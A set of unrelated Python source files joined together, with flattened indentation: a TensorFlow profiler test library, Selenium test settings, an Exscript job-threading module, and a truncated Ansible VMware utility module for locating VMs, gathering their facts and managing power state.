Args:
result: response XML.
elements: a set of interesting element tags.
Returns:
A dict from element tag to element value.
"""
element_mapping = {}
result = StringIO.StringIO(result)
for _, e in ET.iterparse(result, events=('end',)):
if not elements:
break
if e.tag in elements:
element_mapping[e.tag] = e.text
elements.remove(e.tag)
return element_mapping
|
"""A test lib that defines some models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad # pylint: disable=unused-import
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import variable_scope
from tensorflow.python.profiler import model_analyzer
from tensorflow.python.training import gradient_descent
from tensorflow.python.util import _pywrap_tfprof as print_mdl
from tensorflow.python.util import compat
def BuildSmallModel():
"""Build a small forward conv model."""
image = array_ops.zeros([2, 6, 6, 3])
_ = variable_scope.get_variable(
'ScalarW', [],
dtypes.float32,
initializer=init_ops.random_normal_initializer(stddev=0.001))
kernel = variable_scope.get_variable(
'DW', [3, 3, 3, 6],
dtypes.float32,
initializer=init_ops.random_normal_initializer(stddev=0.001))
x = nn_ops.conv2d(image, kernel, [1, 2, 2, 1], padding='SAME')
kernel = variable_scope.get_variable(
'DW2', [2, 2, 6, 12],
dtypes.float32,
initializer=init_ops.random_normal_initializer(stddev=0.001))
x = nn_ops.conv2d(x, kernel, [1, 2, 2, 1], padding='SAME')
return x
def BuildFullModel():
"""Build the full model with conv,rnn,opt."""
seq = []
for i in range(4):
with variable_scope.variable_scope('inp_%d' % i):
seq.append(array_ops.reshape(BuildSmallModel(), [2, 1, -1]))
cell = rnn_cell.BasicRNNCell(16)
out = rnn.dynamic_rnn(
cell, array_ops.concat(seq, axis=1), dtype=dtypes.float32)[0]
target = array_ops.ones_like(out)
loss = nn_ops.l2_loss(math_ops.reduce_mean(target - out))
sgd_op = gradient_descent.GradientDescentOptimizer(1e-2)
return sgd_op.minimize(loss)
def BuildSplittableModel():
"""Build a small model that can be run partially in each step."""
image = array_ops.zeros([2, 6, 6, 3])
kernel1 = variable_scope.get_variable(
'DW', [3, 3, 3, 6],
dtypes.float32,
initializer=init_ops.random_normal_initializer(stddev=0.001))
r1 = nn_ops.conv2d(image, kernel1, [1, 2, 2, 1], padding='SAME')
kernel2 = variable_scope.get_variable(
'DW2', [2, 3, 3, 6],
dtypes.float32,
initializer=init_ops.random_normal_initializer(stddev=0.001))
r2 = nn_ops.conv2d(image, kernel2, [1, 2, 2, 1], padding='SAME')
r3 = r1 + r2
return r1, r2, r3
def SearchTFProfNode(node, name):
"""Search a node in the tree."""
if node.name == name:
return node
for c in node.children:
r = SearchTFProfNode(c, name)
if r: return r
return None
@contextlib.contextmanager
def ProfilerFromFile(profile_file):
"""Initialize a profiler from profile file."""
print_mdl.ProfilerFromFile(compat.as_bytes(profile_file))
profiler = model_analyzer.Profiler.__new__(model_analyzer.Profiler)
yield profiler
print_mdl.DeleteProfiler()
def CheckAndRemoveDoc(profile):
assert 'Doc:' in profile
start_pos = profile.find('Profile:')
return profile[start_pos + 9:]
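# Hedged sketch, not part of the test lib: these builders are meant to be run
# under a Session and inspected with the Profiler imported above. The
# `session` and `variables` imports are assumptions, and exact profiling
# options vary by TF version; the lines below are purely illustrative.
#   sess = session.Session()
#   _ = BuildSmallModel()
#   sess.run(variables.global_variables_initializer())
#   profiler = model_analyzer.Profiler(sess.graph)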
|
class Settings(object):
def __init__(self):
self.radioB = "*googlechrome"
self.browserPath = ""
self.ipAddr = "ci.eden.sahanafoundation.org"
self.ipPort = 4444
self.URL = "http://postgresql.eden.sahanafoundation.org/"
self.app = "postgresql/"
|
import sys
import threading
import multiprocessing
from copy import copy
from functools import partial
from multiprocessing import Pipe
from Exscript.util.impl import serializeable_sys_exc_info
class _ChildWatcher(threading.Thread):
def __init__(self, child, callback):
threading.Thread.__init__(self)
self.child = child
self.cb = callback
def __copy__(self):
watcher = _ChildWatcher(copy(self.child), self.cb)
return watcher
def run(self):
to_child, to_self = Pipe()
try:
self.child.start(to_self)
result = to_child.recv()
self.child.join()
except:
result = sys.exc_info()
finally:
to_child.close()
to_self.close()
if result == '':
self.cb(None)
else:
self.cb(result)
def _make_process_class(base, clsname):
class process_cls(base):
def __init__(self, id, function, name, data):
base.__init__(self, name = name)
self.id = id
self.pipe = None
self.function = function
self.failures = 0
self.data = data
def run(self):
"""
Start the associated function.
"""
try:
self.function(self)
except:
self.pipe.send(serializeable_sys_exc_info())
else:
self.pipe.send('')
finally:
self.pipe = None
def start(self, pipe):
self.pipe = pipe
base.start(self)
process_cls.__name__ = clsname
return process_cls
Thread = _make_process_class(threading.Thread, 'Thread')
Process = _make_process_class(multiprocessing.Process, 'Process')
class Job(object):
__slots__ = ('id',
'func',
'name',
'times',
'failures',
'data',
'child',
'watcher')
def __init__(self, function, name, times, data):
self.id = None
self.func = function
self.name = name is None and str(id(function)) or name
self.times = times
self.failures = 0
self.data = data
self.child = None
self.watcher = None
def start(self, child_cls, on_complete):
self.child = child_cls(self.id, self.func, self.name, self.data)
self.child.failures = self.failures
self.watcher = _ChildWatcher(self.child, partial(on_complete, self))
self.watcher.start()
def join(self):
self.watcher.join()
self.child = None
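# A minimal sketch, not part of the module: run a function in a watched
# worker thread via Job; on_complete receives (job, result), with result
# None on success and exc_info on failure.
if __name__ == '__main__':
    def work(child):
        print('hello from %s' % child.name)
    def on_complete(job, result):
        print('job %s done, result: %r' % (job.name, result))
    job = Job(work, 'demo', times=1, data=None)
    job.id = 1
    job.start(Thread, on_complete)
    job.join()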
|
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import atexit
import os
import re
import ssl
import time
import traceback
from random import randint
REQUESTS_IMP_ERR = None
try:
# requests is required for exception handling of the ConnectionError
import requests
HAS_REQUESTS = True
except ImportError:
REQUESTS_IMP_ERR = traceback.format_exc()
HAS_REQUESTS = False
PYVMOMI_IMP_ERR = None
try:
from pyVim import connect
from pyVmomi import vim, vmodl
HAS_PYVMOMI = True
except ImportError:
PYVMOMI_IMP_ERR = traceback.format_exc()
HAS_PYVMOMI = False
from ansible.module_utils._text import to_text, to_native
from ansible.module_utils.six import integer_types, iteritems, string_types, raise_from
from ansible.module_utils.basic import env_fallback, missing_required_lib
class TaskError(Exception):
def __init__(self, *args, **kwargs):
super(TaskError, self).__init__(*args, **kwargs)
def wait_for_task(task, max_backoff=64, timeout=3600):
"""Wait for given task using exponential back-off algorithm.
Args:
task: VMware task object
max_backoff: Maximum amount of sleep time in seconds
timeout: Timeout for the given task in seconds
Returns: Tuple with True and result for successful task
Raises: TaskError on failure
"""
failure_counter = 0
start_time = time.time()
while True:
if time.time() - start_time >= timeout:
raise TaskError("Timeout")
if task.info.state == vim.TaskInfo.State.success:
return True, task.info.result
if task.info.state == vim.TaskInfo.State.error:
error_msg = task.info.error
host_thumbprint = None
try:
error_msg = error_msg.msg
if hasattr(task.info.error, 'thumbprint'):
host_thumbprint = task.info.error.thumbprint
except AttributeError:
pass
finally:
raise_from(TaskError(error_msg, host_thumbprint), task.info.error)
if task.info.state in [vim.TaskInfo.State.running, vim.TaskInfo.State.queued]:
sleep_time = min(2 ** failure_counter + randint(1, 1000) / 1000, max_backoff)
time.sleep(sleep_time)
failure_counter += 1
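# Hedged usage sketch (assumed object names): waiting on a pyVmomi task
# returned by an API call such as vm.PowerOnVM_Task().
#   task = vm.PowerOnVM_Task()
#   changed, result = wait_for_task(task, max_backoff=32, timeout=600)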
def wait_for_vm_ip(content, vm, timeout=300):
facts = dict()
interval = 15
while timeout > 0:
_facts = gather_vm_facts(content, vm)
if _facts['ipv4'] or _facts['ipv6']:
facts = _facts
break
time.sleep(interval)
timeout -= interval
return facts
def find_obj(content, vimtype, name, first=True, folder=None):
container = content.viewManager.CreateContainerView(folder or content.rootFolder, recursive=True, type=vimtype)
# Get all objects matching type (and name if given)
obj_list = [obj for obj in container.view if not name or to_text(obj.name) == to_text(name)]
container.Destroy()
# Return first match or None
if first:
if obj_list:
return obj_list[0]
return None
# Return all matching objects or empty list
return obj_list
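# Example sketch (names are illustrative): fetch the first VM called 'vm01',
# or every datastore visible from the root folder:
#
#   vm = find_obj(content, [vim.VirtualMachine], 'vm01')
#   datastores = find_obj(content, [vim.Datastore], None, first=False)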
def find_dvspg_by_name(dv_switch, portgroup_name):
portgroups = dv_switch.portgroup
for pg in portgroups:
if pg.name == portgroup_name:
return pg
return None
def find_object_by_name(content, name, obj_type, folder=None, recurse=True):
if not isinstance(obj_type, list):
obj_type = [obj_type]
objects = get_all_objs(content, obj_type, folder=folder, recurse=recurse)
for obj in objects:
if obj.name == name:
return obj
return None
def find_cluster_by_name(content, cluster_name, datacenter=None):
if datacenter:
folder = datacenter.hostFolder
else:
folder = content.rootFolder
return find_object_by_name(content, cluster_name, [vim.ClusterComputeResource], folder=folder)
def find_datacenter_by_name(content, datacenter_name):
return find_object_by_name(content, datacenter_name, [vim.Datacenter])
def get_parent_datacenter(obj):
""" Walk the parent tree to find the objects datacenter """
if isinstance(obj, vim.Datacenter):
return obj
datacenter = None
while True:
if not hasattr(obj, 'parent'):
break
obj = obj.parent
if isinstance(obj, vim.Datacenter):
datacenter = obj
break
return datacenter
def find_datastore_by_name(content, datastore_name):
return find_object_by_name(content, datastore_name, [vim.Datastore])
def find_dvs_by_name(content, switch_name):
return find_object_by_name(content, switch_name, [vim.DistributedVirtualSwitch])
def find_hostsystem_by_name(content, hostname):
return find_object_by_name(content, hostname, [vim.HostSystem])
def find_resource_pool_by_name(content, resource_pool_name):
return find_object_by_name(content, resource_pool_name, [vim.ResourcePool])
def find_network_by_name(content, network_name):
return find_object_by_name(content, network_name, [vim.Network])
def find_vm_by_id(content, vm_id, vm_id_type="vm_name", datacenter=None, cluster=None, folder=None, match_first=False):
""" UUID is unique to a VM, every other id returns the first match. """
si = content.searchIndex
vm = None
if vm_id_type == 'dns_name':
vm = si.FindByDnsName(datacenter=datacenter, dnsName=vm_id, vmSearch=True)
elif vm_id_type == 'uuid':
# Search By BIOS UUID rather than instance UUID
vm = si.FindByUuid(datacenter=datacenter, instanceUuid=False, uuid=vm_id, vmSearch=True)
elif vm_id_type == 'ip':
vm = si.FindByIp(datacenter=datacenter, ip=vm_id, vmSearch=True)
elif vm_id_type == 'vm_name':
folder = None
if cluster:
folder = cluster
elif datacenter:
folder = datacenter.hostFolder
vm = find_vm_by_name(content, vm_id, folder)
elif vm_id_type == 'inventory_path':
searchpath = folder
# get all objects for this path
f_obj = si.FindByInventoryPath(searchpath)
if f_obj:
if isinstance(f_obj, vim.Datacenter):
f_obj = f_obj.vmFolder
for c_obj in f_obj.childEntity:
if not isinstance(c_obj, vim.VirtualMachine):
continue
if c_obj.name == vm_id:
vm = c_obj
if match_first:
break
return vm
def find_vm_by_name(content, vm_name, folder=None, recurse=True):
return find_object_by_name(content, vm_name, [vim.VirtualMachine], folder=folder, recurse=recurse)
def find_host_portgroup_by_name(host, portgroup_name):
for portgroup in host.config.network.portgroup:
if portgroup.spec.name == portgroup_name:
return portgroup
return None
def compile_folder_path_for_object(vobj):
""" make a /vm/foo/bar/baz like folder path for an object """
paths = []
if isinstance(vobj, vim.Folder):
paths.append(vobj.name)
thisobj = vobj
while hasattr(thisobj, 'parent'):
thisobj = thisobj.parent
try:
moid = thisobj._moId
except AttributeError:
moid = None
if moid in ['group-d1', 'ha-folder-root']:
break
if isinstance(thisobj, vim.Folder):
paths.append(thisobj.name)
paths.reverse()
return '/' + '/'.join(paths)
def _get_vm_prop(vm, attributes):
"""Safely get a property or return None"""
result = vm
for attribute in attributes:
try:
result = getattr(result, attribute)
except (AttributeError, IndexError):
return None
return result
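# Example: _get_vm_prop(vm, ('guest', 'toolsVersion')) returns
# vm.guest.toolsVersion, or None when any attribute in the chain is missing.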
def gather_vm_facts(content, vm):
""" Gather facts from vim.VirtualMachine object. """
facts = {
'module_hw': True,
'hw_name': vm.config.name,
'hw_power_status': vm.summary.runtime.powerState,
'hw_guest_full_name': vm.summary.guest.guestFullName,
'hw_guest_id': vm.summary.guest.guestId,
'hw_product_uuid': vm.config.uuid,
'hw_processor_count': vm.config.hardware.numCPU,
'hw_cores_per_socket': vm.config.hardware.numCoresPerSocket,
'hw_memtotal_mb': vm.config.hardware.memoryMB,
'hw_interfaces': [],
'hw_datastores': [],
'hw_files': [],
'hw_esxi_host': None,
'hw_guest_ha_state': None,
'hw_is_template': vm.config.template,
'hw_folder': None,
'hw_version': vm.config.version,
'instance_uuid': vm.config.instanceUuid,
'guest_tools_status': _get_vm_prop(vm, ('guest', 'toolsRunningStatus')),
'guest_tools_version': _get_vm_prop(vm, ('guest', 'toolsVersion')),
'guest_question': vm.summary.runtime.question,
'guest_consolidation_needed': vm.summary.runtime.consolidationNeeded,
'ipv4': None,
'ipv6': None,
'annotation': vm.config.annotation,
'customvalues': {},
'snapshots': [],
'current_snapshot': None,
'vnc': {},
}
# facts that may or may not exist
if vm.summary.runtime.host:
try:
host = vm.summary.runtime.host
facts['hw_esxi_host'] = host.summary.config.name
except vim.fault.NoPermission:
# The user does not have read permission on the host system;
# proceed without this value. It does not affect
# provisioning or power management operations.
pass
if vm.summary.runtime.dasVmProtection:
facts['hw_guest_ha_state'] = vm.summary.runtime.dasVmProtection.dasProtected
datastores = vm.datastore
for ds in datastores:
facts['hw_datastores'].append(ds.info.name)
try:
files = vm.config.files
layout = vm.layout
if files:
facts['hw_files'] = [files.vmPathName]
for item in layout.snapshot:
for snap in item.snapshotFile:
if 'vmsn' in snap:
facts['hw_files'].append(snap)
for item in layout.configFile:
facts['hw_files'].append(os.path.join(os.path.dirname(files.vmPathName), item))
for item in vm.layout.logFile:
facts['hw_files'].append(os.path.join(files.logDirectory, item))
for item in vm.layout.disk:
for disk in item.diskFile:
facts['hw_files'].append(disk)
except Exception:
pass
facts['hw_folder'] = PyVmomi.get_vm_path(content, vm)
cfm = content.customFieldsManager
# Resolve custom values
for value_obj in vm.summary.customValue:
kn = value_obj.key
if cfm is not None and cfm.field:
for f in cfm.field:
if f.key == value_obj.key:
kn = f.name
# Exit the loop immediately, we found it
break
facts['customvalues'][kn] = value_obj.value
net_dict = {}
vmnet = _get_vm_prop(vm, ('guest', 'net'))
if vmnet:
for device in vmnet:
net_dict[device.macAddress] = list(device.ipAddress)
if vm.guest.ipAddress:
if ':' in vm.guest.ipAddress:
facts['ipv6'] = vm.guest.ipAddress
else:
facts['ipv4'] = vm.guest.ipAddress
ethernet_idx = 0
for entry in vm.config.hardware.device:
if not hasattr(entry, 'macAddress'):
continue
if entry.macAddress:
mac_addr = entry.macAddress
mac_addr_dash = mac_addr.replace(':', '-')
else:
mac_addr = mac_addr_dash = None
if (hasattr(entry, 'backing') and hasattr(entry.backing, 'port') and
hasattr(entry.backing.port, 'portKey') and hasattr(entry.backing.port, 'portgroupKey')):
port_group_key = entry.backing.port.portgroupKey
port_key = entry.backing.port.portKey
else:
port_group_key = None
port_key = None
factname = 'hw_eth' + str(ethernet_idx)
facts[factname] = {
'addresstype': entry.addressType,
'label': entry.deviceInfo.label,
'macaddress': mac_addr,
'ipaddresses': net_dict.get(entry.macAddress, None),
'macaddress_dash': mac_addr_dash,
'summary': entry.deviceInfo.summary,
'portgroup_portkey': port_key,
'portgroup_key': port_group_key,
}
facts['hw_interfaces'].append('eth' + str(ethernet_idx))
ethernet_idx += 1
snapshot_facts = list_snapshots(vm)
if 'snapshots' in snapshot_facts:
facts['snapshots'] = snapshot_facts['snapshots']
facts['current_snapshot'] = snapshot_facts['current_snapshot']
facts['vnc'] = get_vnc_extraconfig(vm)
return facts
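# Usage sketch: the returned dict can be consumed directly, e.g.
#
#   facts = gather_vm_facts(content, vm)
#   print(facts['hw_name'], facts['hw_power_status'], facts['ipv4'])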
def deserialize_snapshot_obj(obj):
return {'id': obj.id,
'name': obj.name,
'description': obj.description,
'creation_time': obj.createTime,
'state': obj.state}
def list_snapshots_recursively(snapshots):
snapshot_data = []
for snapshot in snapshots:
snapshot_data.append(deserialize_snapshot_obj(snapshot))
snapshot_data = snapshot_data + list_snapshots_recursively(snapshot.childSnapshotList)
return snapshot_data
def get_current_snap_obj(snapshots, snapob):
snap_obj = []
for snapshot in snapshots:
if snapshot.snapshot == snapob:
snap_obj.append(snapshot)
snap_obj = snap_obj + get_current_snap_obj(snapshot.childSnapshotList, snapob)
return snap_obj
def list_snapshots(vm):
result = {}
snapshot = _get_vm_prop(vm, ('snapshot',))
if not snapshot:
return result
if vm.snapshot is None:
return result
result['snapshots'] = list_snapshots_recursively(vm.snapshot.rootSnapshotList)
current_snapref = vm.snapshot.currentSnapshot
current_snap_obj = get_current_snap_obj(vm.snapshot.rootSnapshotList, current_snapref)
if current_snap_obj:
result['current_snapshot'] = deserialize_snapshot_obj(current_snap_obj[0])
else:
result['current_snapshot'] = dict()
return result
def get_vnc_extraconfig(vm):
result = {}
for opts in vm.config.extraConfig:
for optkeyname in ['enabled', 'ip', 'port', 'password']:
if opts.key.lower() == "remotedisplay.vnc." + optkeyname:
result[optkeyname] = opts.value
return result
def vmware_argument_spec():
return dict(
hostname=dict(type='str',
required=False,
fallback=(env_fallback, ['VMWARE_HOST']),
),
username=dict(type='str',
aliases=['user', 'admin'],
required=False,
fallback=(env_fallback, ['VMWARE_USER'])),
password=dict(type='str',
aliases=['pass', 'pwd'],
required=False,
no_log=True,
fallback=(env_fallback, ['VMWARE_PASSWORD'])),
port=dict(type='int',
default=443,
fallback=(env_fallback, ['VMWARE_PORT'])),
validate_certs=dict(type='bool',
required=False,
default=True,
fallback=(env_fallback, ['VMWARE_VALIDATE_CERTS'])),
)
def connect_to_api(module, disconnect_atexit=True):
hostname = module.params['hostname']
username = module.params['username']
password = module.params['password']
port = module.params.get('port', 443)
validate_certs = module.params['validate_certs']
if not hostname:
module.fail_json(msg="Hostname parameter is missing."
" Please specify this parameter in the task or"
" export the environment variable like 'export VMWARE_HOST=ESXI_HOSTNAME'")
if not username:
module.fail_json(msg="Username parameter is missing."
" Please specify this parameter in the task or"
" export the environment variable like 'export VMWARE_USER=ESXI_USERNAME'")
if not password:
module.fail_json(msg="Password parameter is missing."
" Please specify this parameter in the task or"
" export the environment variable like 'export VMWARE_PASSWORD=ESXI_PASSWORD'")
if validate_certs and not hasattr(ssl, 'SSLContext'):
module.fail_json(msg='pyVim does not support changing verification mode with python < 2.7.9. Either update '
'python or use validate_certs=false.')
ssl_context = None
if not validate_certs and hasattr(ssl, 'SSLContext'):
ssl_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_context.verify_mode = ssl.CERT_NONE
service_instance = None
try:
connect_args = dict(
host=hostname,
user=username,
pwd=password,
port=port,
)
if ssl_context:
connect_args.update(sslContext=ssl_context)
service_instance = connect.SmartConnect(**connect_args)
except vim.fault.InvalidLogin as invalid_login:
module.fail_json(msg="Unable to log on to vCenter or ESXi API at %s:%s as %s: %s" % (hostname, port, username, invalid_login.msg))
except vim.fault.NoPermission as no_permission:
module.fail_json(msg="User %s does not have required permission"
" to log on to vCenter or ESXi API at %s:%s : %s" % (username, hostname, port, no_permission.msg))
except (requests.ConnectionError, ssl.SSLError) as generic_req_exc:
module.fail_json(msg="Unable to connect to vCenter or ESXi API at %s on TCP/%s: %s" % (hostname, port, generic_req_exc))
except vmodl.fault.InvalidRequest as invalid_request:
# Request is malformed
module.fail_json(msg="Failed to get a response from server %s:%s as "
"request is malformed: %s" % (hostname, port, invalid_request.msg))
except Exception as generic_exc:
module.fail_json(msg="Unknown error while connecting to vCenter or ESXi API at %s:%s : %s" % (hostname, port, generic_exc))
if service_instance is None:
module.fail_json(msg="Unknown error while connecting to vCenter or ESXi API at %s:%s" % (hostname, port))
# Disabling atexit should be used only in special cases, such as an IP
# change of the ESXi host, which drops the connection anyway.
# Skipping the disconnect also significantly speeds up module return.
if disconnect_atexit:
atexit.register(connect.Disconnect, service_instance)
return service_instance.RetrieveContent()
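# Typical module boilerplate (a sketch; AnsibleModule comes from
# ansible.module_utils.basic, and 'vm01' is an illustrative name):
#
#   argument_spec = vmware_argument_spec()
#   module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
#   content = connect_to_api(module)
#   vm = find_vm_by_id(content, vm_id='vm01', vm_id_type='vm_name')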
def get_all_objs(content, vimtype, folder=None, recurse=True):
if not folder:
folder = content.rootFolder
obj = {}
container = content.viewManager.CreateContainerView(folder, vimtype, recurse)
for managed_object_ref in container.view:
obj.update({managed_object_ref: managed_object_ref.name})
return obj
def run_command_in_guest(content, vm, username, password, program_path, program_args, program_cwd, program_env):
result = {'failed': False}
tools_status = vm.guest.toolsStatus
if (tools_status == 'toolsNotInstalled' or
tools_status == 'toolsNotRunning'):
result['failed'] = True
result['msg'] = "VMwareTools is not installed or is not running in the guest"
return result
# https://github.com/vmware/pyvmomi/blob/master/docs/vim/vm/guest/NamePasswordAuthentication.rst
creds = vim.vm.guest.NamePasswordAuthentication(
username=username, password=password
)
try:
# https://github.com/vmware/pyvmomi/blob/master/docs/vim/vm/guest/ProcessManager.rst
pm = content.guestOperationsManager.processManager
# https://www.vmware.com/support/developer/converter-sdk/conv51_apireference/vim.vm.guest.ProcessManager.ProgramSpec.html
ps = vim.vm.guest.ProcessManager.ProgramSpec(
programPath=program_path,
arguments=program_args,
workingDirectory=program_cwd,
)
res = pm.StartProgramInGuest(vm, creds, ps)
result['pid'] = res
pdata = pm.ListProcessesInGuest(vm, creds, [res])
# wait for pid to finish
while not pdata[0].endTime:
time.sleep(1)
pdata = pm.ListProcessesInGuest(vm, creds, [res])
result['owner'] = pdata[0].owner
result['startTime'] = pdata[0].startTime.isoformat()
result['endTime'] = pdata[0].endTime.isoformat()
result['exitCode'] = pdata[0].exitCode
if result['exitCode'] != 0:
result['failed'] = True
result['msg'] = "program exited non-zero"
else:
result['msg'] = "program completed successfully"
except Exception as e:
result['msg'] = str(e)
result['failed'] = True
return result
def serialize_spec(clonespec):
"""Serialize a clonespec or a relocation spec"""
data = {}
attrs = dir(clonespec)
attrs = [x for x in attrs if not x.startswith('_')]
for x in attrs:
xo = getattr(clonespec, x)
if callable(xo):
continue
xt = type(xo)
if xo is None:
data[x] = None
elif isinstance(xo, vim.vm.ConfigSpec):
data[x] = serialize_spec(xo)
elif isinstance(xo, vim.vm.RelocateSpec):
data[x] = serialize_spec(xo)
elif isinstance(xo, vim.vm.device.VirtualDisk):
data[x] = serialize_spec(xo)
elif isinstance(xo, vim.vm.device.VirtualDeviceSpec.FileOperation):
data[x] = to_text(xo)
elif isinstance(xo, vim.Description):
data[x] = {
'dynamicProperty': serialize_spec(xo.dynamicProperty),
'dynamicType': serialize_spec(xo.dynamicType),
'label': serialize_spec(xo.label),
'summary': serialize_spec(xo.summary),
}
elif hasattr(xo, 'name'):
data[x] = to_text(xo) + ':' + to_text(xo.name)
elif isinstance(xo, vim.vm.ProfileSpec):
pass
elif issubclass(xt, list):
data[x] = []
for xe in xo:
data[x].append(serialize_spec(xe))
elif issubclass(xt, string_types + integer_types + (float, bool)):
if issubclass(xt, integer_types):
data[x] = int(xo)
else:
data[x] = to_text(xo)
elif issubclass(xt, bool):
data[x] = xo
elif issubclass(xt, dict):
data[to_text(x)] = {}
for k, v in xo.items():
k = to_text(k)
data[x][k] = serialize_spec(v)
else:
data[x] = str(xt)
return data
def find_host_by_cluster_datacenter(module, content, datacenter_name, cluster_name, host_name):
dc = find_datacenter_by_name(content, datacenter_name)
if dc is None:
module.fail_json(msg="Unable to find datacenter with name %s" % datacenter_name)
cluster = find_cluster_by_name(content, cluster_name, datacenter=dc)
if cluster is None:
module.fail_json(msg="Unable to find cluster with name %s" % cluster_name)
for host in cluster.host:
if host.name == host_name:
return host, cluster
return None, cluster
def set_vm_power_state(content, vm, state, force, timeout=0):
"""
Set the power state of a VM based on the current and requested
states. When force is set, the transition is attempted even from
intermediate power states such as suspended.
"""
facts = gather_vm_facts(content, vm)
expected_state = state.replace('_', '').replace('-', '').lower()
current_state = facts['hw_power_status'].lower()
result = dict(
changed=False,
failed=False,
)
# Need Force
if not force and current_state not in ['poweredon', 'poweredoff']:
result['failed'] = True
result['msg'] = "Virtual Machine is in %s power state. Force is required!" % current_state
return result
# State is not already true
if current_state != expected_state:
task = None
try:
if expected_state == 'poweredoff':
task = vm.PowerOff()
elif expected_state == 'poweredon':
task = vm.PowerOn()
elif expected_state == 'restarted':
if current_state in ('poweredon', 'poweringon', 'resetting', 'poweredoff'):
task = vm.Reset()
else:
result['failed'] = True
result['msg'] = "Cannot restart virtual machine in the current state %s" % current_state
elif expected_state == 'suspended':
if current_state in ('poweredon', 'poweringon'):
task = vm.Suspend()
else:
result['failed'] = True
result['msg'] = 'Cannot suspend virtual machine in the current state %s' % current_state
elif expected_state in ['shutdownguest', 'rebootguest']:
if current_state == 'poweredon':
if vm.guest.toolsRunningStatus == 'guestToolsRunning':
if expected_state == 'shutdownguest':
task = vm.ShutdownGuest()
if timeout > 0:
result.update(wait_for_poweroff(vm, timeout))
else:
task = vm.RebootGuest()
# Set result['changed'] immediately because
# shutdown and reboot return None.
result['changed'] = True
else:
result['failed'] = True
result['msg'] = "VMware tools should be installed for guest shutdown/reboot"
else:
result['failed'] = True
result['msg'] = "Virtual machine %s must be in poweredon state for guest shutdown/reboot" % vm.name
else:
result['failed'] = True
result['msg'] = "Unsupported expected state provided: %s" % expected_state
except Exception as e:
result['failed'] = True
result['msg'] = to_text(e)
if task:
wait_for_task(task)
if task.info.state == 'error':
result['failed'] = True
result['msg'] = task.info.error.msg
else:
result['changed'] = True
# need to get new metadata if changed
result['instance'] = gather_vm_facts(content, vm)
return result
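# Example sketch: power a VM off, forcing the transition from any state.
# 'powered-off' normalizes to 'poweredoff' via the replace/lower logic above:
#
#   result = set_vm_power_state(content, vm, 'powered-off', force=True)
#   if result['failed']:
#       module.fail_json(**result)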
def wait_for_poweroff(vm, timeout=300):
result = dict()
interval = 15
while timeout > 0:
if vm.runtime.powerState.lower() == 'poweredoff':
break
time.sleep(interval)
timeout -= interval
else:
result['failed'] = True
result['msg'] = 'Timeout while waiting for VM power off.'
return result
class PyVmomi(object):
def __init__(self, module):
"""
Constructor
"""
if not HAS_REQUESTS:
module.fail_json(msg=missing_required_lib('requests'),
exception=REQUESTS_IMP_ERR)
if not HAS_PYVMOMI:
module.fail_json(msg=missing_required_lib('PyVmomi'),
exception=PYVMOMI_IMP_ERR)
self.module = module
self.params = module.params
self.si = None
self.current_vm_obj = None
self.content = connect_to_api(self.module)
def is_vcenter(self):
"""
Check if given hostname is vCenter or ESXi host
Returns: True if given connection is with vCenter server
False if given connection is with ESXi server
"""
api_type = None
try:
api_type = self.content.about.apiType
except (vmodl.RuntimeFault, vim.fault.VimFault) as exc:
self.module.fail_json(msg="Failed to get status of vCenter server : %s" % exc.msg)
if api_type == 'VirtualCenter':
return True
elif api_type == 'HostAgent':
return False
def get_managed_objects_properties(self, vim_type, properties=None):
"""
Function to look up a Managed Object Reference in vCenter / ESXi Environment
:param vim_type: Type of vim object e.g, for datacenter - vim.Datacenter
:param properties: List of properties related to vim object e.g. Name
:return: list of object content entries matching the given type and properties
"""
# Get Root Folder
root_folder = self.content.rootFolder
if properties is None:
properties = ['name']
# Create Container View with default root folder
mor = self.content.viewManager.CreateContainerView(root_folder, [vim_type], True)
# Create Traversal spec
traversal_spec = vmodl.query.PropertyCollector.TraversalSpec(
name="traversal_spec",
path='view',
skip=False,
type=vim.view.ContainerView
)
# Create Property Spec
property_spec = vmodl.query.PropertyCollector.PropertySpec(
type=vim_type,  # Type of object to be retrieved
all=False,
pathSet=properties
)
# Create Object Spec
object_spec = vmodl.query.PropertyCollector.ObjectSpec(
obj=mor,
skip=True,
selectSet=[traversal_spec]
)
# Create Filter Spec
filter_spec = vmodl.query.PropertyCollector.FilterSpec(
objectSet=[object_spec],
propSet=[property_spec],
reportMissingObjectsInResults=False
)
return self.content.propertyCollector.RetrieveContents([filter_spec])
# Virtual Machine related functions
def get_vm(self):
"""
Function to find unique virtual machine either by UUID or Name.
Returns: virtual machine object if found, else None.
"""
vm_obj = None
user_desired_path = None
if self.params['uuid']:
vm_obj = find_vm_by_id(self.content, vm_id=self.params['uuid'], vm_id_type="uuid")
elif self.params['name']:
objects = self.get_managed_objects_properties(vim_type=vim.VirtualMachine, properties=['name'])
vms = []
for temp_vm_object in objects:
if len(temp_vm_object.propSet) != 1:
continue
for temp_vm_object_property in temp_vm_object.propSet:
if temp_vm_object_property.val == self.params['name']:
vms.append(temp_vm_object.obj)
break
# get_managed_objects_properties may return multiple virtual machines;
# the following code tries to find the user-desired one based on the folder specified.
if len(vms) > 1:
# We have found multiple virtual machines, decide depending upon folder value
if self.params['folder'] is None:
self.module.fail_json(msg="Multiple virtual machines with same name [%s] found, "
"Folder value is a required parameter to find uniqueness "
"of the virtual machine" % self.params['name'],
details="Please see documentation of the vmware_guest module "
"for folder parameter.")
# Get folder path where virtual machine is located
# User provided folder where user thinks virtual machine is present
user_folder = self.params['folder']
# User defined datacenter
user_defined_dc = self.params['datacenter']
# User defined datacenter's object
datacenter_obj = find_datacenter_by_name(self.content, self.params['datacenter'])
# Get Path for Datacenter
dcpath = compile_folder_path_for_object(vobj=datacenter_obj)
# Nested folder does not return trailing /
if not dcpath.endswith('/'):
dcpath += '/'
if user_folder in [None, '', '/']:
# User provided blank value or
# User provided only root value, we fail
self.module.fail_json(msg="vmware_guest found multiple virtual machines with same "
"name [%s], please specify folder path other than blank "
"or '/'" % self.params['name'])
elif user_folder.startswith('/vm/'):
# User provided nested folder under VMware default vm folder i.e. folder = /vm/india/finance
